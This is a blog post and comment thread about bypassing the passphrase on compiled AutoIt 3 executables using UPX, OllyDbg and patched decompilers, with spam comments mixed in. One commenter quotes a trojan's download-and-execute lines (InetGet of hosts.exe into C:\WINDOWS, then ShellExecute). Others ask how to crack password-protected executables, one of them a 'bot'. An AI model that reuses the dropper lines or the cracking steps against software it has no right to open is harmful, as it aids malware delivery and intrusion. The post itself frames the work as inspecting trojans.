UPDATE: New link for the file below: http://www.monkey-tech.com/files/AutoIt%203-Dec.zip
I’ve been hopelessly trying to figure out how to bypass the pass-phrase for AutoIT v. 3.2.0.1. One of our readers Daniel kindly posted a link to ANITWPA (http://antiwpa.org.ru/), where they already did this. I downloaded the “improved” decompiler and it worked great. Here’s link to one of their mirrors (I couldn’t get to the original site):
Basically, they bypass the passphrase altogether. I managed to get to the point in OllyDbg (great tool, BTW, I’ll post some OllyDbg things I recently learned soon) where I found out that:
- The passphrase used for “encrypting” is stored in the file as an MD5 hash.
- The resulting .exe file is UPXed.
- To find the MD5, first use the upx.exe provided by autoit (\autoit-v3.2.0.1\Aut2Exe\upx.exe) to decompress the .exe:
- Open a command prompt and use upx.exe with the “-d” switch:
- EXAMPLE: upx -d mytestfile.exe
- More about UPX can be found here: http://en.wikipedia.org/wiki/UPX
- This will decompress “mytestfile.exe” – it almost doubles in size.
- The MD5 hash of the passphrase is found at offset 0x0005d618 in the decompressed file (you can use hiew or any binary file viewer – even OllyDbg!).
- When you run the exe2aut to “decrypt” the file, it will take the passphrase you enter and convert it to MD5. There is also some XORing going on. This is where I’m weak right now.
- At some point, it will open the EXE and do…something. This is where I was stuck.
I’ll examine the AutoIt3-Decompiler from CW2K to see if I can learn anything from them. If anyone has info on how they did it, please post a comment. From what I can see, it seems like they just “patched” the original AutoIT decompiler, probably to skip the whole checking of passphrases or fill in the MD5 passphrase from the one in the file.
Why am I doing this? Why do I care? Two reasons:
- To emphasise that people should NOT store passwords or sensitive information in their AutoIT scripts.
- To quote from the readme file in the “improved” decompiler above:
“Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.“
obijuan: [techno]plebe 
“Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.“
That’s right. Lots of these so-called AutoIt trojans are being spreading among our community. Using the above tool, I had the ability to decompile them all to see how they affected my system.
Thanks very much for your great posts. Keep up your good work!
The zip file is not on that url, can you please upload it somewhere?
Nowadays autoitscripts can be obfuscated. So even if you can decompile, you will not be able to read the code you just decompiled.
http://www.autoitscript.com/forum/index.php?showtopic=32171&pid=231190&st=0&#
this site may help you then… http://www.openrce.org/forums/posts/178
Here is a working mirror for the “Improved” version:
“http://t-line.net.ua/antiwpa/Other/tmp/”.
Enjoy!
it doesnt seem to work for me anymore on newly made scripts -.-‘
Has anyone shed any new light on this subject, I have an autoit 3.2.2.0 that I have been trying to get the original script from the current exe file. I have tried the tutorial at OpenRCE and it does not seem to work.
TIA
I completely Reverse Engineered the office AutoIt3 Decompiler and made it
Open source. See
->myAutToExe1_51_src.zip
http://nfo.host.sk/antiwpa/Other/tmp/
* can also decompile ‘Auto Hot Key Scripts’ (AHK – is some spin off project from Autoit it)
Also I added ‘support’ for some common Obfuscator like ‘van Zande’ (the one from the autoit download page) and Encode it.
For historical reason and for ppl from the east (China, Japan… ) how have DBCS (Double Binary Char Set) enable on they windows myAutToExe currently don’t come alon with there is also the ‘Exe2Aut-CW2K-Edition2.exe’ which now also supports unicode scripts.
->AutoIt 3-Decompiler CW2K-Edition2 + Improved Version.zip
http://nfo.host.sk/antiwpa/Other/tmp/
Relate Forum Link
http://maghia.free.fr/Board/viewtopic.php?t=234
Has anyone has autoIt 3-Decompiler CW2K-Edition2 + Improved Version.zip? The site is die and i cannot download
another mirror site ?
best regards
AutoIt 3.2.6.0 and higher compiles to bytecode. Makes checking scripts for backdoors harder… 😦
Will anyone care to write a decompiler?
thanks for the info guys, i got a autoit progarm that i realy needed but it had a trojan, with the decompiler i got on one of the urls i could remove the trojan form the script and rebuilt it =D
look what was in the script
InetGet(“http://www.xxxxxxx/hosts.exe”, “C:\WINDOWS\hosts.exe”,1)
Sleep(40000)
ShellExecute(“hosts.exe”,”C:\WINDOWS\”)
i removed that and rebult the script and now im happy =D
thanks again
hello
thank u for the great information.
i have one AutoIt Decompile (along with some latest version of AtoIt3, i d’loaded)
Just got interested in AutoIt after i decompiled a nasty Trojan.. 🙂
The links that u have mentioned here are no longer available, i need some decompiler that “bypass the passphrase”… plz help me.
got to decompile a few more Trojans.. 😉
Hey If you guys came through any AutoIT written viruses split them into a lot of pieses(use a simple spitter) zip all the files and mail it to me at mario_thilanga@yahoo.com i thnk i will then try my best to programe a cure to those viruses and mail it to who ever you are.Try me may be youl find a help.Dnt wory im not a spammer.i jst wont ot help!!!
Bt remember it will take a little bit of time 🙂
trytr565yuo890bvnmbnkiuoiuo4r56y
I got this bot that has a password on it – does anyone have a current way to break the encryption and decompile an exe?
All the old links are dead.. Please help 🙂
ростов объявления о знакомстве тула форум знакомств сайт знакомств г кызыл секс знакомства г ногинска знакомства бисексуалы сосновый бор секс знакомства знакомства лав усинск
bestr of dati
Hi there! Do you know if they make any plugins to help with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains. If you know of any please share. Thanks!
hi………how can I debug an autoit file using Olly debug?……
Cool blog! Is your theme custom made or did you download it from somewhere?
A theme like yours with a few simple tweeks would really make my blog shine.
Please let me know where you got your theme.
Thanks a lot
There’s certainly a great deal to find out about this issue. I really like all of the points you made.
I’ve been attending around for the optimal website to acquire one particular.:)
I normally usually do not respond to messages, but on this matter.
WoW:)
カシオ カタログ ミネトンカ ローファー http://chuanqisfq.onlinecentigrade2013.com/
I’m trampled by your contents carry on the wonderful work.
I feel happiness to read the content that you are posting.